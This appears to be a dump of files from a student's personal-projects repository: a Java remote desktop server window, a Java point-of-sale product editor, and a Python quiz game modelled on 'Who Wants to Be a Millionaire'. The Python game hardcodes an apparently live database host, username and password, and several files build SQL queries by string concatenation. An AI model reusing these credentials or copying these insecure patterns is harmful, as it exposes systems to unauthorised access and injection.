"text": "# Team Viewer\n\nRemote Desktop App in Java. It allows a personal computer’s desktop environment to be run remotely on one system, while being\ndisplayed on a separate client device. It is based on the popular software TeamViewer.\n"
},
{
"alpha_fraction": 0.5407989025115967,
"alphanum_fraction": 0.5502565503120422,
"avg_line_length": 36.64393997192383,
"blob_id": "13f471797818983c451d3112aba448764e305a5b",
"content_id": "2ff1ae1c1ae643d02191a36d743ae9d5271ed639",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9939,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 264,
"path": "/TeamViewer/MainScreen.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.awt.AWTException;\nimport java.awt.Image;\nimport java.awt.MenuItem;\nimport java.awt.PopupMenu;\nimport java.awt.SystemTray;\nimport java.awt.Toolkit;\nimport java.awt.TrayIcon;\nimport java.awt.event.ActionEvent;\nimport java.awt.event.ActionListener;\nimport java.awt.event.WindowAdapter;\nimport java.awt.event.WindowEvent;\nimport java.awt.event.WindowStateListener;\nimport java.io.BufferedReader;\nimport java.io.File;\nimport java.io.FileReader;\nimport javax.swing.JFrame;\nimport javax.swing.JOptionPane;\nimport javax.swing.UIManager;\n\n\npublic class MainScreen extends javax.swing.JFrame {\n \n ServerForStudents obj;\n \n serverforteamviewer obj2;\n TrayIcon trayIcon;\n SystemTray tray;\n \n public MainScreen() {\n initComponents();\n setSize(500, 500);\n \n addToSystemTray();\n \n setDefaultCloseOperation(HIDE_ON_CLOSE); \n }\n\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jButton1 = new javax.swing.JButton();\n jButton2 = new javax.swing.JButton();\n jb3 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jButton1.setText(\"Start Server\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(60, 40, 150, 30);\n\n jButton2.setText(\"Stop Server\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(70, 110, 140, 30);\n\n jb3.setText(\"Set passwrd\");\n jb3.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jb3ActionPerformed(evt);\n }\n });\n getContentPane().add(jb3);\n jb3.setBounds(60, 180, 160, 30);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n try {\n obj = new ServerForStudents(8888);\n \n obj2 = new serverforteamviewer(7777);\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n\n jButton1.setEnabled(false);\n jButton2.setEnabled(true);\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n obj.shutdown();\n \n System.out.println(\"Server Shutdown !!!\");\n \n jButton1.setEnabled(true);\n jButton2.setEnabled(false);\n \n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jb3ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jb3ActionPerformed\n\n \n setpassword object1 = new setpassword(); \n \n object1.setVisible(true);\n \n }//GEN-LAST:event_jb3ActionPerformed\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if 
(\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(MainScreen.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new MainScreen().setVisible(true);\n }\n });\n }\n\n void addToSystemTray() {\n try {\n System.out.println(\"setting look and feel\");\n UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());\n } catch (Exception e) {\n System.out.println(\"Unable to set LookAndFeel\");\n }\n if (SystemTray.isSupported()) {\n System.out.println(\"system tray supported\");\n tray = SystemTray.getSystemTray();\n\n Image image = Toolkit.getDefaultToolkit().getImage(\"src/pics/linux.jpg\");\n ActionListener exitListener;\n exitListener = new ActionListener() {\n public void actionPerformed(ActionEvent e) {\n// String pass = \"123\";\n File f = new File(\"src/files/logindetails.txt\");\n try {\n FileReader fr = new FileReader(f);\n BufferedReader br = new BufferedReader(fr);\n// while (true) {\n String user = br.readLine();\n String pass = br.readLine();\n pass = pass.substring(pass.indexOf(\":\") + 1);\n String password = JOptionPane.showInputDialog(MainScreen.this, \"Enter password\");\n if (password.equals(pass)) {\n System.out.println(\"Exiting....\");\n System.exit(0);\n// if (br.readLine() == null) {\n// break;\n// }\n } else {\n JOptionPane.showMessageDialog(rootPane, \"Wrong password !\");\n }\n// }\n } catch (Exception ex) {\n ex.printStackTrace();\n }\n\n }\n\n };\n PopupMenu popup = new PopupMenu();\n MenuItem defaultItem = new MenuItem(\"Exit\");\n defaultItem.addActionListener(exitListener);\n popup.add(defaultItem);\n defaultItem = new MenuItem(\"Open\");\n defaultItem.addActionListener(new ActionListener() {\n public void actionPerformed(ActionEvent e) {\n setVisible(true);\n tray.remove(trayIcon);\n\n setExtendedState(JFrame.NORMAL);\n }\n });\n popup.add(defaultItem);\n trayIcon = new TrayIcon(image, \"SystemTray Demo\", popup);\n trayIcon.setImageAutoSize(true);\n } else {\n System.out.println(\"system tray not supported\");\n }\n addWindowListener(new WindowAdapter() {\n @Override\n public void windowClosing(WindowEvent e) {\n try {\n tray.add(trayIcon);\n setVisible(false);\n } catch (Exception ex) {\n ex.printStackTrace();\n }\n }\n\n });\n addWindowStateListener(new WindowStateListener() {\n @Override\n public void windowStateChanged(WindowEvent e) {\n if (e.getNewState() == ICONIFIED) {\n try {\n tray.add(trayIcon);\n } catch (AWTException ex) {\n ex.printStackTrace();\n }\n setVisible(false);\n System.out.println(\"added to SystemTray\");\n }\n if (e.getNewState() == 7) {\n try {\n tray.add(trayIcon);\n setVisible(false);\n System.out.println(\"added to SystemTray\");\n } catch (AWTException ex) {\n System.out.println(\"unable to add to system tray\");\n }\n }\n if (e.getNewState() == MAXIMIZED_BOTH) {\n 
tray.remove(trayIcon);\n setVisible(true);\n System.out.println(\"Tray icon removed\");\n }\n if (e.getNewState() == NORMAL) {\n tray.remove(trayIcon);\n setVisible(true);\n System.out.println(\"Tray icon removed\");\n }\n }\n });\n setIconImage(Toolkit.getDefaultToolkit().getImage(\"src/pics/linux.jpg\"));\n\n setVisible(true);\n setSize(300, 200);\n// setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n }\n \n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JButton jb3;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.7615384459495544,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 42.33333206176758,
"blob_id": "555dac5d134139860797465065cda4787c85f529",
"content_id": "6390efe6adfa89b39bbec722e62e809bf0082705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 3,
"path": "/who_wants_to_be_the_millionare/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "# WHO WANTS TO BE A MILLIONAIRE\n\nDesktop game “Who wants to be a millionaire” in Python 3 based on popular TV show using PyCharm.\n"
},
{
"alpha_fraction": 0.6078037023544312,
"alphanum_fraction": 0.629525363445282,
"avg_line_length": 35.28832244873047,
"blob_id": "50dc15be7038f1a415d6dd6f72dd017ab57064ff",
"content_id": "8b98d9745fa442ae96db0905792da3c7439be2be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9944,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 274,
"path": "/Point_Of_Sale-in_java/src/updateproduct.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.io.File;\nimport java.sql.ResultSet;\nimport java.util.Date;\nimport javax.swing.ImageIcon;\nimport javax.swing.JFileChooser;\nimport javax.swing.JOptionPane;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n/**\n *\n * @author vedantmahajan\n */\npublic class updateproduct extends javax.swing.JFrame {\n\n /**\n * Creates new form updateproduct\n */\n String pid, name, desc, bar, photo, price;\n\n public updateproduct(String pid, String name, String desc, String bar, String photo, String price) {\n initComponents();\n\n this.pid = pid;\n\n this.name = name;\n\n this.desc = desc;\n\n this.bar = bar;\n\n this.photo = photo;\n\n this.price = price;\n\n tf_update_pid.setText(pid);\n\n tf_update_name.setText(name);\n\n ta_update_desc.setText(desc);\n\n tf_update_barcode.setText(bar);\n\n lb_update_photo_path.setText(photo);\n\n tf_update_price.setText(price);\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n jLabel4 = new javax.swing.JLabel();\n jLabel5 = new javax.swing.JLabel();\n jLabel6 = new javax.swing.JLabel();\n tf_update_pid = new javax.swing.JTextField();\n tf_update_name = new javax.swing.JTextField();\n tf_update_barcode = new javax.swing.JTextField();\n lb_update_photo = new javax.swing.JLabel();\n jScrollPane1 = new javax.swing.JScrollPane();\n ta_update_desc = new javax.swing.JTextArea();\n tf_update_price = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n jButton2 = new javax.swing.JButton();\n lb_update_photo_path = new javax.swing.JLabel();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"PID\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(50, 40, 21, 16);\n\n jLabel2.setText(\"NAME\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(50, 110, 37, 16);\n\n jLabel3.setText(\"DESCRIPTION\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(50, 170, 130, 16);\n\n jLabel4.setText(\"BARCODE\");\n getContentPane().add(jLabel4);\n jLabel4.setBounds(50, 260, 60, 16);\n\n jLabel5.setText(\"PHOTO\");\n getContentPane().add(jLabel5);\n jLabel5.setBounds(50, 320, 60, 16);\n\n jLabel6.setText(\"PRICE\");\n getContentPane().add(jLabel6);\n jLabel6.setBounds(40, 490, 35, 16);\n getContentPane().add(tf_update_pid);\n tf_update_pid.setBounds(220, 30, 260, 26);\n getContentPane().add(tf_update_name);\n tf_update_name.setBounds(220, 100, 260, 26);\n getContentPane().add(tf_update_barcode);\n tf_update_barcode.setBounds(220, 250, 260, 26);\n\n lb_update_photo.setText(\"jLabel7\");\n getContentPane().add(lb_update_photo);\n lb_update_photo.setBounds(220, 300, 200, 110);\n\n ta_update_desc.setColumns(20);\n ta_update_desc.setRows(5);\n jScrollPane1.setViewportView(ta_update_desc);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(220, 140, 260, 100);\n\n tf_update_price.addActionListener(new java.awt.event.ActionListener() {\n public void 
actionPerformed(java.awt.event.ActionEvent evt) {\n tf_update_priceActionPerformed(evt);\n }\n });\n getContentPane().add(tf_update_price);\n tf_update_price.setBounds(220, 490, 260, 26);\n\n jButton1.setText(\"BROWSE\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(460, 350, 94, 29);\n\n jButton2.setText(\"SAVE\");\n jButton2.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton2ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton2);\n jButton2.setBounds(180, 540, 75, 29);\n\n lb_update_photo_path.setText(\"jLabel7\");\n getContentPane().add(lb_update_photo_path);\n lb_update_photo_path.setBounds(220, 450, 520, 16);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_update_priceActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_update_priceActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_update_priceActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n\n if ((tf_update_name.getText() == null) || (ta_update_desc.getText() == null)) {\n JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n } else {\n String newfilename = new Date().getTime() + \".jpg\";\n\n File file_obj1 = new File(lb_update_photo_path.getText()); //doubt 1\n\n new savefileinfolder(file_obj1, newfilename);\n\n try {\n\n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from product where PID='\" + pid + \"'\");\n\n //resultset_obj.moveToCurrentRow();\n if (resultset_obj.next()) {\n\n resultset_obj.updateString(\"Name\", tf_update_name.getText());\n\n resultset_obj.updateString(\"Description\", ta_update_desc.getText());\n\n resultset_obj.updateString(\"Barcode\", tf_update_barcode.getText());\n\n resultset_obj.updateString(\"Price\", tf_update_price.getText());\n\n resultset_obj.updateString(\"Photo\", \"src/pics/\" + newfilename);\n\n resultset_obj.updateRow();\n\n JOptionPane.showMessageDialog(rootPane, \"DATA UPDATE SUCCESSFUL !\");\n\n }\n\n } catch (Exception e) {\n e.printStackTrace();\n }\n\n }\n\n\n }//GEN-LAST:event_jButton2ActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n\n JFileChooser jfc = new JFileChooser();\n\n int ans = jfc.showOpenDialog(this);\n\n if (ans == JFileChooser.APPROVE_OPTION) {\n File file_obj = jfc.getSelectedFile();\n\n lb_update_photo.setIcon(new ImageIcon(file_obj.getPath()));\n\n lb_update_photo_path.setText(file_obj.getPath());\n\n } else {\n JOptionPane.showMessageDialog(rootPane, \"you need to select a file to move further\");\n }\n\n }//GEN-LAST:event_jButton1ActionPerformed\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n 
javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(updateproduct.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n // new updateproduct().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JLabel jLabel4;\n private javax.swing.JLabel jLabel5;\n private javax.swing.JLabel jLabel6;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JLabel lb_update_photo;\n private javax.swing.JLabel lb_update_photo_path;\n private javax.swing.JTextArea ta_update_desc;\n private javax.swing.JTextField tf_update_barcode;\n private javax.swing.JTextField tf_update_name;\n private javax.swing.JTextField tf_update_pid;\n private javax.swing.JTextField tf_update_price;\n // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.4767986834049225,
"alphanum_fraction": 0.5184455513954163,
"avg_line_length": 42.418880462646484,
"blob_id": "81fa8886cbc1861ae756ca02a4e64742a0710a33",
"content_id": "fd16cd6429521ed055c578463dda1ce098c87e87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14719,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 339,
"path": "/who_wants_to_be_the_millionare/finalform.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "import threading\nfrom time import sleep\nfrom tkinter import *\nfrom tkinter.messagebox import *\n\nimport pyttsx3 as pyttsx3\nfrom pygame import mixer\nfrom pymysql import *\n# from ttkthemes import themed_tk as tk\n# from tkinter import ttk\nid_data_list=[]\nCOUNTER=0\nANS_COUNT=0\namount_list = [\"5,000\", \"10,000\",\"20,000\",\"40,000\",\"80,000\",\"1,60,000\", \"3,20,000\", \"6,40,000\",\"12,50,000\", \"25,00,000\", \"50,00,000\",\"1 Crore\", \"3 Crore\", \"5 Crore\", \"7 Crore\"]\nclass kbc3(Toplevel):\n def flip(self):\n global COUNTER\n engine = pyttsx3.init()\n engine.stop()\n msgbox = askquestion('Flip', 'Are you sure you want to Flip the question?')\n if msgbox == 'yes':\n\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER + 1])\n cr = conn.cursor()\n cr.execute(query_new)\n result = cr.fetchone()\n self.lb_question.config(text = result[1])\n self.bt_option_A.config(text = result[2])\n self.bt_option_B.config(text = result[3])\n self.bt_option_C.config(text = result[4])\n self.bt_option_D.config(text = result[5])\n self.flip(state = 'disable')\n COUNTER = COUNTER + 1\n\n\n def fiftyfifty(self):\n engine = pyttsx3.init()\n engine.stop()\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr = conn.cursor()\n cr.execute(query_new)\n result = cr.fetchone()\n if result[0][0] == 'A':\n self.bt_option_B.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n elif result[0][0] == 'B':\n self.bt_option_A.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n elif result[0][0] == 'C':\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n elif result[0][0] == 'D':\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.fifty.config(state = 'disable')\n\n def exit(self):\n engine = pyttsx3.init()\n engine.stop()\n msgbox = askquestion('Exit application', 'Are you sure you want to exit')\n if msgbox == 'yes':\n self.root.destroy()\n\n def confirm_ans(self, option_num):\n print(option_num)\n msgbox1 = askquestion('Confirm Answer', 'Are you sure about the answer?')\n if msgbox1 == 'yes':\n\n if option_num == 'A':\n self.bt_option_A.config(bg = \"#e0d902\")\n self.bt_option_A.config(state= 'disable')\n self.bt_option_B.config(state= 'disable')\n self.bt_option_C.config(state= 'disable')\n self.bt_option_D.config(state= 'disable')\n\n elif option_num == 'B':\n self.bt_option_B.config(bg=\"#e0d902\")\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n\n elif option_num == 'C':\n self.bt_option_C.config(bg=\"#e0d902\")\n self.bt_option_A.config(state=\"disable\")\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n\n\n elif option_num == 'D':\n self.bt_option_D.config(bg=\"#e0d902\")\n self.bt_option_A.config(state='disable')\n self.bt_option_B.config(state='disable')\n self.bt_option_C.config(state='disable')\n self.bt_option_D.config(state='disable')\n engine = pyttsx3.init()\n engine.stop()\n sleep(2)\n self.check_ans(option_num)\n\n\n def check_ans(self,ans):\n print(ans)\n global 
id_data_list\n global COUNTER\n global ANS_COUNT\n global amount_list\n conn = connect(\"snlvedant.db.7623447.b14.hostedresource.net\", \"snlvedant\", \"VMMeducation@123\", \"snlvedant\")\n query2 = \"SELECT ans FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr1 = conn.cursor()\n cr1.execute(query2)\n result = cr1.fetchone()\n print(result[0])\n if ans == result[0]:\n mixer.init()\n clap = \"song/sahi.mp3\"\n mixer.music.set_volume(0.5)\n mixer.music.load(clap)\n mixer.music.play()\n self.bt_amount.config(text=amount_list[ANS_COUNT])\n self.bt_amount.config(bg=\"green\")\n self.amount_bt_list[ANS_COUNT].config(bg=\"green\", fg=\"white\")\n correct_ans = showinfo('Answer','Right answer')\n self.bt_option_A.config(state='normal', bg=\"WHITE\")\n self.bt_option_B.config(state='normal', bg=\"WHITE\")\n self.bt_option_C.config(state='normal', bg=\"WHITE\")\n self.bt_option_D.config(state='normal', bg=\"WHITE\")\n\n if ANS_COUNT<14:\n COUNTER = COUNTER + 1\n try:\n self.amount_bt_list[ANS_COUNT + 1].config(bg=\"#f9eb22\", fg=\"white\")\n query_new = \"SELECT * FROM `kbc1` where q_id =\" + str(id_data_list[COUNTER])\n cr1 = conn.cursor()\n cr1.execute(query_new)\n result = cr1.fetchone()\n self.lb_question.config(text=result[1])\n self.bt_option_A.config(text=result[2])\n self.bt_option_B.config(text=result[3])\n self.bt_option_C.config(text=result[4])\n self.bt_option_D.config(text=result[5])\n sleep(1)\n\n def demo():\n engine = pyttsx3.init()\n engine.setProperty('rate',140)\n engine.say(result[1])\n sleep(1)\n engine.say('option a')\n engine.say(result[2])\n engine.say('option b')\n engine.say(result[3])\n engine.say('option c')\n engine.say(result[4])\n engine.say('option d')\n engine.say(result[5])\n engine.runAndWait()\n engine.stop()\n\n def demo2():\n t = threading.Thread(target=demo)\n t.start()\n\n self.root.after(1000,demo2)\n ANS_COUNT = ANS_COUNT + 1\n\n except:\n print(\"network prob\")\n else: #if the ques exceeds 14 that means the user has given all the correct answers\n engine = pyttsx3.init()\n engine.stop()\n self.bt_option_A.config(state = 'disable')\n self.bt_option_B.config(state = 'disable')\n self.bt_option_C.config(state = 'disable')\n self.bt_option_D.config(state = 'disable')\n engine = pyttsx3.init()\n engine.setProperty('rate',140)\n engine.say(\"winner\")\n showinfo(\"\", \"winner\")\n # correct_ans = showinfo('Answer','Wrong Answer')\n else: #if ans doesnt match\n sleep(2)\n engine = pyttsx3.init()\n engine.stop()\n showinfo(\"\", 'you lose')\n\n def __init__(self,parent):\n # self.root=Tk()\n self.root = Toplevel(parent)\n self.root.transient(parent)\n self.root.parent = parent\n self.root.title(\"KBC\")\n self.root.protocol(\"WM_DELETE_WINDOW\", self.exit)\n self.root.iconbitmap(\"img/icon.ico\")\n self.root.config(background=\"#192E8B\")\n self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n self.root.configure(background=\"#090035\")\n #----------------Frame--------------------\n head_frame=Frame(self.root,bg=\"#090035\")\n middle_frame=Frame(self.root,bg=\"#090035\")\n #-----------------middle-------------------\n left_frame=Frame(middle_frame,bg=\"#090035\")\n left_frame.grid(row=0,column=0)\n #-----------------------------------left_frame---------------------------\n logo_frame=Frame(left_frame,bg=\"#090035\")\n option_frame=Frame(left_frame,bg=\"#090035\")\n logo_frame.pack(pady=20)\n option_frame.pack(pady=20)\n #----------------------------------------------------------------------\n 
amount_frame=Frame(middle_frame,bg=\"#090035\")\n amount_frame.grid(row=0,column=1)\n #-----------------------------------------\n body_frame=Frame(self.root,bg=\"#090035\")\n head_frame.pack()\n middle_frame.pack()\n body_frame.pack()\n #----------------life_line------------------------\n\n self.fifty=Button(head_frame,width=20,text=\"50-50\", font=('bold',12),borderwidth=5,bg=\"#3277e6\",fg=\"white\", command = self.fiftyfifty)\n self.fifty.grid(row=0,column=0,padx=50,pady=10)\n\n self.flip=Button(head_frame,width=20,text=\"Flip\", font=('bold',12),borderwidth=5,bg=\"#3277e6\",fg=\"white\", command = self.flip)\n self.flip.grid(row=0,column=1,padx=50,pady=10)\n #-----------------logo---------------------\n img = PhotoImage(file=\"img/que.png\")\n Label(logo_frame, image=img, bg='#090035').pack(pady=10)\n self.lb_question=Label(logo_frame,text=\"\",bg=\"#090035\",fg=\"white\",font=(\"bold\",12))\n self.lb_question.pack(pady=10)\n #-----------------option_frame--------------------------\n self.bt_option_A=Button(option_frame,width=40, command = lambda :self.confirm_ans('A'))\n self.bt_option_B=Button(option_frame,width=40, command = lambda :self.confirm_ans('B'))\n self.bt_option_C=Button(option_frame,width=40, command = lambda :self.confirm_ans('C'))\n self.bt_option_D=Button(option_frame,width=40, command = lambda :self.confirm_ans('D'))\n\n self.bt_option_A.grid(row=0,column=0,padx=10,pady=10)\n self.bt_option_B.grid(row=0,column=1,padx=10,pady=10)\n self.bt_option_C.grid(row=1,column=0,padx=10,pady=10)\n self.bt_option_D.grid(row=1,column=1,padx=10,pady=10)\n\n #------------------------amount_frame---------------------------------------------\n self.bt_15=Button(amount_frame,text=\"15 7 Crore\",width=\"20\")\n self.bt_15.pack()\n self.bt_14 = Button(amount_frame, text=\"14 5 Crore\", width=\"20\")\n self.bt_14.pack()\n self.bt_13 = Button(amount_frame, text=\"13 3 Crore\", width=\"20\")\n self.bt_13.pack()\n self.bt_12 = Button(amount_frame, text=\"12 1 Crore\", width=\"20\")\n self.bt_12.pack()\n self.bt_11 = Button(amount_frame, text=\"11 50,00,000\", width=\"20\")\n self.bt_11.pack()\n self.bt_10=Button(amount_frame,text=\"10 25,00,000\",width=\"20\")\n self.bt_10.pack()\n self.bt_9 = Button(amount_frame, text=\"9 12,50,000\", width=\"20\")\n self.bt_9.pack()\n self.bt_8 = Button(amount_frame, text=\"8 6,40,000\", width=\"20\")\n self.bt_8.pack()\n self.bt_7 = Button(amount_frame, text=\"7 3,20,000\", width=\"20\")\n self.bt_7.pack()\n self.bt_6 = Button(amount_frame, text=\"6 1,60,000\", width=\"20\")\n self.bt_6.pack()\n self.bt_5 = Button(amount_frame, text=\"5 80,000\", width=\"20\")\n self.bt_5.pack()\n self.bt_4 = Button(amount_frame, text=\"4 40,000\", width=\"20\")\n self.bt_4.pack()\n self.bt_3 = Button(amount_frame, text=\"3 20,000\", width=\"20\")\n self.bt_3.pack()\n self.bt_2 = Button(amount_frame, text=\"2 10,000\", width=\"20\")\n self.bt_2.pack()\n self.bt_1 = Button(amount_frame, text=\"1 5,000\", width=\"20\")\n self.bt_1.pack()\n self.amount_bt_list=[self.bt_1,self.bt_2,self.bt_3,self.bt_4,self.bt_5,self.bt_6,self.bt_7,self.bt_8,self.bt_9,self.bt_10,self.bt_11,self.bt_12,self.bt_13,self.bt_14,self.bt_15]\n #---------------------body frame------------------------------\n self.bt_quit=Button(body_frame,text=\"Quit\",font=(\"bold\",12),width=20,command=self.exit)\n self.bt_amount=Button(body_frame,font=(\"bold\",12),width=20)\n self.bt_quit.grid(row=0,column=0,padx=30,pady=10,)\n self.bt_amount.grid(row=0,column=1,padx=30,pady=10)\n 
